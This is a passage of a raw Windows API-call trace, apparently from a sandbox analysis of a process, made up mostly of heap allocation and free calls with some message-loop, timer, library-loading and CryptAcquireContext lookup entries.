RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e504d0 [0155.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0155.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0155.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0155.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0155.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0155.561] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0155.561] LoadLibraryW (lpLibFileName="Advapi32.dll") returned 0x756e0000 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b98 | out: hHeap=0x970000) returned 1 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e542b0 | out: hHeap=0x970000) returned 1 [0155.561] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0155.562] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0155.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0155.562] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe68 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0155.562] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLESET", cchLength=0x14 | out: lpsz="__CRYPT_DLLHANDLESET") returned 0x14 [0155.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe68 | out: hHeap=0x970000) returned 1 [0155.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54c68 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0155.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50608 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0155.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e543a0 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0155.562] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0155.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0155.562] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54c78 [0155.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c78 | out: hHeap=0x970000) returned 1 [0155.562] PeekMessageW (in: lpMsg=0x8cf248, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf248) returned 0 [0155.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0155.562] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50638 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e543a0 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50608 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54c68 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50650 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0155.563] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50608 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54c68 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e542b0 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50650 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b98 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50638 [0155.563] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50710 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0155.563] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0155.563] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0156.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0156.305] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0156.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e541c0 [0156.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50518 [0156.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e505c0 [0156.305] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0156.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54350 [0156.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0156.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0156.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50518 | out: hHeap=0x970000) returned 1 [0156.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0156.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e505c0 | out: hHeap=0x970000) returned 1 [0156.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bc8 | out: hHeap=0x970000) returned 1 [0156.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0156.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e541c0 | out: hHeap=0x970000) returned 1 [0156.306] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.306] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 1 [0156.306] TranslateMessage (lpMsg=0x8cf4a8) returned 0 [0156.306] DispatchMessageW (lpMsg=0x8cf4a8) returned 0x0 [0156.306] KillTimer (hWnd=0x402c2, uIDEvent=0x1) returned 1 [0156.306] SetTimer (hWnd=0x402c2, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0156.306] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0156.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0156.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0156.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0156.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0156.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69928 [0156.306] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0156.307] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="WIN_8", cchCount1=5, lpString2="WIN_2000", cchCount2=8) returned 3 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69928 | out: hHeap=0x970000) returned 1 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ca8 | out: hHeap=0x970000) returned 1 [0156.307] PeekMessageW (in: lpMsg=0x8cf4a8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf4a8) returned 0 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ca8 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506e0 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fff0 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0156.307] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fff0 | out: hHeap=0x970000) returned 1 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e509b0 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0156.307] PeekMessageW (in: lpMsg=0x8cf048, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf048) returned 0 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b58 [0156.307] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.307] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78810 | out: hHeap=0x970000) returned 1 [0156.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0156.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50848 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507a0 [0156.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50920 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50770 [0156.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50728 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507e8 [0156.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e540d0 [0156.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50830 | out: hHeap=0x970000) returned 1 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50740 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.308] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50890 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.308] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507d0 [0156.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50830 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508d8 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50788 [0156.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78810 [0156.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e540d0 | out: hHeap=0x970000) returned 1 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50878 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50938 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50950 [0156.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50968 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54bb8 [0156.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50758 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50860 [0156.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508a8 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54b48 [0156.309] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bc8 [0156.309] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e507b8 [0156.309] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506f8 [0156.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0156.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b48 | out: hHeap=0x970000) returned 1 [0156.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0156.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b48 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e506c8 [0156.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0156.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506c8 | out: hHeap=0x970000) returned 1 [0156.310] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54bb8 | out: hHeap=0x970000) returned 1 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54bb8 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0156.310] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54b58 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54b58 | out: hHeap=0x970000) returned 1 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50998 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54db8 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54db8 | out: hHeap=0x970000) returned 1 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d88 | out: hHeap=0x970000) returned 1 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54468 [0156.311] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50980 [0156.311] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d68 [0156.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0156.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0156.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0156.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d68 | out: hHeap=0x970000) returned 1 [0156.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.312] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0156.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e508c0 [0156.312] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d88 [0156.312] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0156.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0156.343] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptAcquireContext", cchWideChar=20, lpMultiByteStr=0x2e69928, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptAcquireContext", lpUsedDefaultChar=0x0) returned 20 [0156.343] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0156.343] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 